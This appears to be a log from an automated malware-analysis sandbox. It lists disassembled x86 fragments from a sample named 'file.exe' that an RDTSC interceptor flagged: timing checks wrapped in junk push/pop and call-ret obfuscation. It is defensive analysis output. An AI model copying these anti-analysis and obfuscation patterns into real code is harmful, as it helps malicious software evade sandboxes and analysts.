Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 944B8B second address: 944BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FE83906A388h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov si, AE41h 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jbe 00007FE83906A386h 0x00000030 je 00007FE83906A386h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 944F72 second address: 944F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9450A7 second address: 9450F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE83906A393h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FE83906A388h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ebx 0x0000002c pushad 0x0000002d popad 0x0000002e pop ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9450F0 second address: 945102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FE839054480h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945FDF second address: 945FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945E7F second address: 945E84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945FE3 second address: 945FF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94681D second address: 946822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946822 second address: 946839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A393h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948567 second address: 94856D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94856D second address: 948571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949AD2 second address: 949AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949AD6 second address: 949ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949ADC second address: 949AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949AE6 second address: 949AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9038FF second address: 903907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F6EA second address: 94F703 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FE83906A38Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 950778 second address: 95077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95077C second address: 9507FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FE83906A388h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007FE83906A397h 0x00000029 push 00000000h 0x0000002b xor edi, 457CEFCCh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FE83906A388h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+122D2CC3h] 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jl 00007FE83906A388h 0x0000005b pushad 0x0000005c popad 0x0000005d jl 00007FE83906A38Ch 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F8B2 second address: 94F8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F8B8 second address: 94F8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FE83906A386h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95186F second address: 951874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952921 second address: 952928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952928 second address: 952939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FE839054476h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951A1D second address: 951A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951A21 second address: 951A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FE839054476h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954B13 second address: 954B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE83906A392h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953C24 second address: 953C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C5D second address: 954C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C63 second address: 954C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C68 second address: 954C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C72 second address: 954C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955CFA second address: 955D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957DF3 second address: 957DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958E01 second address: 958E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FE83906A38Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E75 second address: 956E7F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E7F second address: 956E84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95804B second address: 958052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E84 second address: 956E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958052 second address: 958068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE839054482h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E91 second address: 956E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DA09 second address: 95DA13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DA13 second address: 95DA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DA1D second address: 95DA94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FE839054478h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FE839054478h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov ebx, eax 0x00000046 add edi, dword ptr [ebp+122D2C03h] 0x0000004c push 00000000h 0x0000004e mov bl, 64h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007FE839054478h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DBE9 second address: 95DBEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966A44 second address: 966A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E21 second address: 906E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E25 second address: 906E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E29 second address: 906E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A392h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FE83906A386h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E4A second address: 906E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970887 second address: 97088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970E0B second address: 970E11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970E11 second address: 970E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971293 second address: 971299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9713EF second address: 9713FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9716D7 second address: 9716E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FE839054476h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9716E7 second address: 9716ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9716ED second address: 97170B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE839054476h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE83905447Ah 0x00000013 js 00007FE839054476h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97170B second address: 97170F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97170F second address: 97171B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97184F second address: 971855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971855 second address: 97185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97185B second address: 971860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97713B second address: 977143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 977143 second address: 977148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901E13 second address: 901E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901E18 second address: 901E2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901E2D second address: 901E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942A35 second address: 942A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942A3C second address: 942A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942B6B second address: 942B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007FE83906A392h 0x0000000d jbe 00007FE83906A38Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943059 second address: 9430B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE839054482h 0x0000000a popad 0x0000000b add dword ptr [esp], 1722A8A6h 0x00000012 mov ecx, 1B4C98CCh 0x00000017 call 00007FE839054479h 0x0000001c jmp 00007FE839054486h 0x00000021 push eax 0x00000022 ja 00007FE83905447Eh 0x00000028 jnp 00007FE839054478h 0x0000002e pushad 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9430B4 second address: 9430B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9430B9 second address: 9430DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054482h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnc 00007FE839054490h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9431EE second address: 943207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A395h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943207 second address: 94320B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94320B second address: 94323B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b call 00007FE83906A399h 0x00000010 xor dword ptr [ebp+122D3337h], edi 0x00000016 pop edi 0x00000017 nop 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94323B second address: 943245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943245 second address: 943250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943250 second address: 943256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9434D8 second address: 9434E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jo 00007FE83906A394h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9434E8 second address: 9434EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943880 second address: 9438FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FE83906A388h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D1DF1h] 0x0000002d push 0000001Eh 0x0000002f jmp 00007FE83906A399h 0x00000034 nop 0x00000035 jnc 00007FE83906A38Eh 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9438FC second address: 943900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943900 second address: 943904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943CD5 second address: 943CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943CDF second address: 943D09 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d lea eax, dword ptr [ebp+124747D3h] 0x00000013 or ch, FFFFFFB5h 0x00000016 mov edi, dword ptr [ebp+122D2C03h] 0x0000001c nop 0x0000001d pushad 0x0000001e jc 00007FE83906A388h 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97687F second address: 976885 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976885 second address: 97689C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FE83906A386h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FE83906A386h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97689C second address: 9768A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9769E3 second address: 9769E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B57 second address: 976B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83905447Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B6A second address: 976B81 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE83906A38Eh 0x00000008 jns 00007FE83906A386h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B81 second address: 976B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B85 second address: 976B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A395h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
